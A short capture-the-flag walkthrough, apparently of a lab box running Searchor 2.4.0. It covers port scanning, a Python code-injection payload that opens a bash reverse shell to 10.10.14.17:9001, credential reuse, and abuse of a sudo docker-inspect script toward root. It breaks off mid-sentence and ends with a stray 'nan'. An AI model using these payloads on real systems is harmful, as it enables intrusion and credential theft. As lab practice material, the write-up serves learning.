I scanned ports with nmap command.
Enumeration
I added the domain name /etc/hosts
Initial Foothold
I searched the searchor 2.4.0 whether be vulnerable or not.
Okey. There is a vulnerable version and a weakness that allows arbitrary code execution.
'+%2b+__import__('os').popen('id').read()+%2b+'
'+%2b+__import__('os').popen('bash+-c+"sh+-i+>%26+/dev/tcp/10.10.14.17/9001+0>%261"').read()+%2b'
I got the reverse shell and read the user flag.
A while minute later, I found the config and there is a credential for cody. At the same time cody’s password is also svc user. I login as svc user.
Privilege Escalation
I looked docker config via docker-inscpect command.
sudo python3 /opt/scripts/system-checkup.py docker-inspect --format='{{json .config}}' 960
I executed docker-ps command and looked the mysql runs on the system and I login to mysql as gitea credentials
I saw the administrator’s passwd but ı could not crack the hash and I tried config password that found with docker inspect command. Yes it works.
I login to gitea as administrator user and examined the codes I found a vulnerability that cause got a root user.
I prepare the payload to exexute in the home/svc and
nan
